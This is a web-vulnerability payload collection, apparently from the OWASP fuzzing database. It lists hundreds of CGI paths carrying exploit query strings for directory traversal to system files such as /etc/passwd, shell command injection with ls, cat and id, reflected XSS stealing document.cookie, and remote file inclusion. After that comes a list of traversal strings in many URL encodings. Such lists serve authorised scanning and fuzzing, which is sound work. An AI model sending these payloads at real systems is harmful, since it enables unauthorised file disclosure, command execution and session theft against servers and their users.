add_ftp.cgi<br />
addbanner.cgi<br />
adduser.cgi<br />
admin.cgi<br />
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}<br />
admin.php<br />
admin.php3<br />
admin.pl<br />
adminhot.cgi<br />
adminwww.cgi<br />
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd<br />
aglimpse<br />
aglimpse.cgi<br />
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,<br />
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd<br />
amadmin.pl<br />
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}<br />
ans.pl?p=../../../../../usr/bin/id|&blah<br />
ans/ans.pl?p=../../../../../usr/bin/id|&blah<br />
anyboard.cgi<br />
archie<br />
architext_query.cgi<br />
architext_query.pl<br />
ash<br />
astrocam.cgi<br />
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL<br />
auction/auction.cgi?action=<br />
auctiondeluxe/auction.pl<br />
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}<br />
auth_data/auth_user_file.txt<br />
awl/auctionweaver.pl<br />
awstats.pl<br />
awstats/awstats.pl<br />
ax-admin.cgi<br />
ax.cgi<br />
axs.cgi<br />
badmin.cgi<br />
banner.cgi<br />
bannereditor.cgi<br />
bash<br />
bb-hist?HI<br />
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK<br />
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK<br />
bbs_forum.cgi<br />
betsie/parserl.pl/<script>alert('XSS')</script>;<br />
bigconf.cgi?command=view_textfile&file={KNOWNFILE}&filters=<br />
bizdb1-search.cgi<br />
blog/<br />
blog/mt-check.cgi<br />
blog/mt-load.cgi<br />
blog/mt.cfg<br />
bnbform<br />
bnbform.cgi<br />
book.cgi?action=default&current=|cat%20{KNOWNFILE}|&form_tid=996604045&prev=main.html&list_message_index=10<br />
boozt/admin/index.cgi?section=5&input=1<br />
bsguest.cgi?email=x;ls<br />
bslist.cgi?email=x;ls<br />
build.cgi<br />
bulk/bulk.cgi<br />
c_download.cgi<br />
cached_feed.cgi<br />
cachemgr.cgi<br />
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00<br />
calendar<br />
calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22<br />
calendar.pl<br />
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|<br />
calendar/index.cgi<br />
calendar_admin.pl?config=|cat%20{KNOWNFILE}|<br />
calender_admin.pl<br />
campas?%0acat%0a{KNOWNFILE}%0a<br />
cart.pl<br />
cart.pl?db='<br />
cartmanager.cgi<br />
cbmc/forums.cgi<br />
ccbill-local.cgi?cmd=MENU<br />
ccbill-local.pl?cmd=MENU<br />
cgforum.cgi<br />
cgi-lib.pl<br />
cgicso?query=<script>alert('XSS')</script><br />
cgicso?query=AAA<br />
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00<br />
cgiwrap<br />
cgiwrap/%3Cfont%20color=red%3E<br />
cgiwrap/~@U<br />
cgiwrap/~JUNK(5)<br />
cgiwrap/~root<br />
change-your-password.pl<br />
classified.cgi<br />
classifieds<br />
classifieds.cgi<br />
classifieds/classifieds.cgi<br />
classifieds/index.cgi<br />
clickcount.pl?view=test<br />
clickresponder.pl<br />
code.php<br />
code.php3<br />
com5..........................................................................................................................................................................................................................box<br />
com5.java<br />
com5.pl<br />
commandit.cgi<br />
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html<br />
common.php?f=0&ForumLang=../../../../../../../../../..{KNOWNFILE}<br />
common/listrec.pl<br />
common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|<br />
compatible.cgi<br />
count.cgi<br />
counter-ord<br />
counterbanner<br />
counterbanner-ord<br />
counterfiglet-ord<br />
counterfiglet/nc/<br />
cs<br />
csChatRBox.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csGuestBook.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csLive<br />
csNews.cgi<br />
csNewsPro.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csPassword.cgi<br />
csPassword/csPassword.cgi<br />
csh<br />
cstat.pl<br />
cutecast/members/<br />
cvsblame.cgi?file=<script>alert('XSS')</script><br />
cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script><br />
cvslog.cgi?file=<script>alert('XSS')</script><br />
cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script><br />
cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week<br />
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD<br />
dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script><br />
dasp/fm_shell.asp<br />
data/fetch.php?page=<br />
date<br />
day5datacopier.cgi<br />
day5datanotifier.cgi<br />
db2www/library/document.d2w/show<br />
db4web_c/dbdirname/{KNOWNFILE}<br />
db_manager.cgi<br />
dbman/db.cgi?db=no-db<br />
dcforum.cgi?az=list&forum=../../../../../../../../../..{KNOWNFILE}%00<br />
dcshop/auth_data/auth_user_file.txt<br />
dcshop/orders/orders.txt<br />
dfire.cgi<br />
diagnose.cgi<br />
dig.cgi<br />
directorypro.cgi?want=showcat&show=../../../../../../../../../..{KNOWNFILE}%00<br />
displayTC.pl<br />
dnewsweb<br />
donothing<br />
dose.pl?daily&somefile.txt&|ls|<br />
download.cgi<br />
dumpenv.pl<br />
edit.pl<br />
empower?DB=whateverwhatever<br />
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
enter.cgi<br />
environ.cgi<br />
environ.pl<br />
environ.pl?param1=<script>alert(document.cookie)</script><br />
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E<br />
eshop.pl/seite=;cat%20eshop.pl|<br />
ex-logger.pl<br />
excite<br />
excite;IF<br />
ezadmin.cgi<br />
ezboard.cgi<br />
ezman.cgi<br />
ezshopper/loadpage.cgi?user_id=1&file=|cat%20{KNOWNFILE}|<br />
ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../..{KNOWNFILE}&distinct=1<br />
ezshopper2/loadpage.cgi<br />
ezshopper3/loadpage.cgi<br />
faqmanager.cgi?toc={KNOWNFILE}%00<br />
faxsurvey?cat%20{KNOWNFILE}<br />
filemail<br />
filemail.pl<br />
finger<br />
finger.pl<br />
flexform<br />
flexform.cgi<br />
fom.cgi?file=<script>alert('XSS')</script><br />
fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable<br />
formmail<br />
formmail.cgi<br />
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
formmail.pl<br />
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
fortune<br />
ftp.pl<br />
ftpsh<br />
gH.cgi<br />
gbadmin.cgi?action=change_adminpass<br />
gbadmin.cgi?action=change_automail<br />
gbadmin.cgi?action=colors<br />
gbadmin.cgi?action=setup<br />
gbook/gbook.cgi?_MAILTO=xx;ls<br />
gbpass.pl<br />
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1<br />
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1<br />
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1<br />
getdoc.cgi<br />
gettransbitmap<br />
glimpse<br />
gm-authors.cgi<br />
gm-cplog.cgi<br />
gm.cgi<br />
guestbook.cgi<br />
guestbook.cgi?user=cpanel&template=|/bin/cat%20{KNOWNFILE}|<br />
guestbook.pl<br />
guestbook/passwd<br />
handler.cgi<br />
hitview.cgi<br />
horde/test.php<br />
horde/test.php?mode=phpinfo<br />
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00<br />
htgrep?file=index.html&hdr={KNOWNFILE}<br />
html2chtml.cgi<br />
html2wml.cgi<br />
htmlscript?../../../../../../../../../..{KNOWNFILE}<br />
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E<br />
htsearch?-c/nonexistant<br />
htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=<br />
htsearch?exclude=%60{KNOWNFILE}%60<br />
ibill.pm<br />
icat<br />
if/admin/nph-build.cgi<br />
ikonboard/help.cgi?<br />
imageFolio.cgi<br />
imagefolio/admin/admin.cgi<br />
imagemap<br />
include/new-visitor.inc.php<br />
index.js0x70<br />
index.pl<br />
info2www<br />
info2www '(../../../../../../../bin/mail root <{KNOWNFILE}><br />
infosrch.cgi<br />
ion-p?page=../../../../..{KNOWNFILE}<br />
jailshell<br />
jj<br />
journal.cgi?folder=journal.cgi%00<br />
ksh<br />
lastlines.cgi?process<br />
listrec.pl<br />
loadpage.cgi?user_id=1&file=../../../../../../../../../..{KNOWNFILE}<br />
loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini<br />
log-reader.cgi<br />
log/<br />
log/nether-log.pl?checkit<br />
login.cgi<br />
login.pl<br />
login.pl?course_id=\<br />
logit.cgi<br />
logs.pl<br />
logs/<br />
logs/access_log<br />
logs/error_log<br />
lookwho.cgi<br />
ls<br />
lwgate<br />
lwgate.cgi<br />
magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../..{KNOWNFILE}<br />
mail<br />
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../..{KNOWNFILE}%00<br />
mailit.pl<br />
maillist.cgi<br />
maillist.pl<br />
mailnews.cgi<br />
main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../..{KNOWNFILE}<br />
majordomo.pl<br />
man2html<br />
mastergate/search.cgi?search=0&search_on=all<br />
meta.pl<br />
mgrqcgi<br />
mini_logger.cgi<br />
mmstdod.cgi<br />
moin.cgi?test<br />
mojo/mojo.cgi<br />
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}<br />
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
mrtg.cgi?cfg=blah<br />
ms_proxy_auth_query/<br />
mt-static/<br />
mt-static/mt-check.cgi<br />
mt-static/mt-load.cgi<br />
mt-static/mt.cfg<br />
mt/<br />
mt/mt-check.cgi<br />
mt/mt-load.cgi<br />
mt/mt.cfg<br />
multihtml.pl?multi={KNOWNFILE}%00html<br />
musicqueue.cgi<br />
myguestbook.cgi?action=view<br />
namazu.cgi<br />
nbmember.cgi?cmd=list_all_users<br />
netauth.cgi?cmd=show&page=../../../../../../../../../..{KNOWNFILE}<br />
netpad.cgi<br />
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}<br />
nimages.php<br />
nlog-smb.cgi<br />
nlog-smb.pl<br />
non-existent.pl<br />
noshell<br />
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
nph-error.pl<br />
nph-exploitscanget.cgi<br />
nph-maillist.pl<br />
nph-publish<br />
nph-publish.cgi<br />
nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0<br />
nph-test-cgi<br />
ntitar.pl<br />
opendir.php?{KNOWNFILE}<br />
orders/orders.txt<br />
pagelog.cgi<br />
pals-cgi?palsAction=restart&documentName={KNOWNFILE}<br />
parse-file<br />
pass<br />
passwd<br />
passwd.txt<br />
password<br />
pbcgi.cgi?name=Joe%Camel&email=%3C<br />
perl<br />
perl?-v<br />
perlshop.cgi<br />
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'<br />
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}<br />
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'<br />
phf<br />
phf.cgi?QALIA<br />
phf?Qname=root%0Acat%20{KNOWNFILE}%20<br />
photo/<br />
photo/manage.cgi<br />
photo/protected/manage.cgi<br />
php-cgi<br />
php.cgi?{KNOWNFILE}<br />
plusmail<br />
pollit/Poll_It_<br />
pollssi.cgi<br />
post-query<br />
post_query<br />
postcards.cgi<br />
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}<br />
printenv<br />
printenv.tmp<br />
probecontrol.cgi?command=enable&username=cancer&password=killer<br />
processit.pl<br />
profile.cgi<br />
pu3.pl<br />
publisher/search.cgi?dir=jobs&template=;cat%20{KNOWNFILE}|&output_number=10<br />
query<br />
query?mss=%2e%2e/config<br />
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&cart_id=<br />
quikstore.cfg<br />
quizme.cgi<br />
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}<br />
ratlog.cgi<br />
redirect<br />
register.cgi<br />
replicator/webpage.cgi/<br />
responder.cgi<br />
retrieve_password.pl<br />
rksh<br />
rmp_query<br />
robadmin.cgi<br />
robpoll.cgi<br />
rpm_query<br />
rsh<br />
rtm.log<br />
rwcgi60<br />
rwcgi60/showenv<br />
rwwwshell.pl<br />
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1<br />
sawmill?rfcf+%22<br />
sbcgi/sitebuilder.cgi<br />
scoadminreg.cgi<br />
scripts/*%0a.pl<br />
search.cgi<br />
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini<br />
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini<br />
search.php?searchstring=<script>alert(document.cookie)</script><br />
search.pl<br />
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script><br />
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00<br />
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc<br />
sendform.cgi<br />
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message<br />
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}<br />
session/adminlogin<br />
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}<br />
sh<br />
shop.cgi?page=../../../../../../..{KNOWNFILE}<br />
shop.pl/page=;cat%20shop.pl|<br />
shop/auth_data/auth_user_file.txt<br />
shop/orders/orders.txt<br />
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}<br />
shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20{KNOWNFILE}|<br />
show.pl<br />
showcheckins.cgi?person=<script>alert('XSS')</script><br />
showuser.cgi<br />
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|<br />
simplestguest.cgi<br />
simplestmail.cgi<br />
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|<br />
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|<br />
sojourn.cgi?cat=../../../../../../../../../../etc/password%00<br />
spin_client.cgi?aaaaaaaa<br />
ss<br />
sscd_suncourier.pl<br />
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}<br />
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E<br />
stat.pl<br />
stat/<br />
stats-bin-p/reports/index.html<br />
stats.pl<br />
stats.prf<br />
stats/<br />
stats/statsbrowse.asp?filepath=c:\&Opt=3<br />
stats_old/<br />
statsconfig<br />
statusconfig.pl<br />
statview.pl<br />
store.cgi?<br />
store/agora.cgi?cart_id=<script>alert('XSS')</script><br />
store/agora.cgi?page=whatever33.html<br />
store/index.cgi?page=../../../../../../../..{KNOWNFILE}<br />
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00<br />
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00<br />
survey<br />
survey.cgi<br />
sws/admin.html<br />
sws/manager.pl<br />
tablebuild.pl<br />
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&action=view&matchview=1<br />
tcsh<br />
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../..{KNOWNFILE}<br />
test-cgi.tcl<br />
test-cgi?/*<br />
test-env<br />
test.cgi<br />
test/test.cgi<br />
texis/junk<br />
texis/phine<br />
textcounter.pl<br />
tidfinder.cgi<br />
tigvote.cgi<br />
title.cgi<br />
tpgnrock<br />
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
troops.cgi<br />
ttawebtop.cgi/?action=start&pg=../../../../../../../../../..{KNOWNFILE}<br />
ultraboard.cgi<br />
ultraboard.pl<br />
unlg1.1<br />
unlg1.2<br />
update.dpgs<br />
upload.cgi<br />
uptime<br />
urlcount.cgi?%3CIMG%20<br />
ustorekeeper.pl?command=goto&file=../../../../../../../../../..{KNOWNFILE}<br />
utm/admin<br />
utm/utm_stat<br />
view-source<br />
view-source?view-source<br />
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00<br />
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script><br />
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\<br />
viewlogs.pl<br />
viewsource?{KNOWNFILE}<br />
viralator.cgi<br />
virgil.cgi<br />
vote.cgi<br />
vpasswd.cgi<br />
vq/demos/respond.pl?<script>alert('XSS')</script><br />
w3-msql<br />
w3-sql<br />
wais.pl<br />
way-board.cgi?db={KNOWNFILE}%00<br />
way-board/way-board.cgi?db={KNOWNFILE}%00<br />
webais<br />
webbbs.cgi<br />
webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20{KNOWNFILE}<br />
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE<br />
webdist.cgi?distloc=;cat%20{KNOWNFILE}<br />
webdriver<br />
webgais<br />
webif.cgi<br />
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
webmap.cgi<br />
webnews.pl<br />
webplus?about<br />
webplus?script=../../../../../../../../../..{KNOWNFILE}<br />
websendmail<br />
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}<br />
webutil.pl<br />
webutils.pl<br />
webwho.pl<br />
where.pl?sd=ls%20/etc<br />
whois.cgi?action=load&whois=%3Bid<br />
whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}<br />
whois/whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}<br />
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}<br />
windmail<br />
wrap<br />
wrap.cgi<br />
ws_ftp.ini<br />
www-sql<br />
wwwadmin.pl<br />
wwwboard.cgi.cgi<br />
wwwboard.pl<br />
wwwstats.pl<br />
wwwthreads/3tvars.pm<br />
wwwthreads/w3tvars.pm<br />
wwwwais<br />
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00<br />
zsh<br />
</pre><br />
<br />
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===<br />
<pre><br />
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) <br />
# Derived from the awesome "Directory Traversal Fuzzing Code" v0.2 by Luca Carettoni<br />
# Did some cleanup & removed anything to the right of {FILE} for inclusion in a<br />
# separate fuzzfile for more flexibility, for the OWASP Fuzzing Code Database. <br />
# adam.muntner@uietmove.com <br />
<br />
../{FILE}<br />
../../{FILE}<br />
../../../{FILE}<br />
../../../../{FILE}<br />
../../../../../{FILE}<br />
../../../../../../{FILE}<br />
../../../../../../../{FILE}<br />
../../../../../../../../{FILE}<br />
..%2f{FILE}<br />
..%2f..%2f{FILE}<br />
..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
..%252f{FILE}<br />
..%252f..%252f{FILE}<br />
..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
..\{FILE}<br />
..\..\{FILE}<br />
..\..\..\{FILE}<br />
..\..\..\..\{FILE}<br />
..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\..\{FILE}<br />
..%255c{FILE}<br />
..%255c..%255c{FILE}<br />
..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%5c..%5c{FILE}<br />
..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
..%c0%af{FILE}<br />
..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
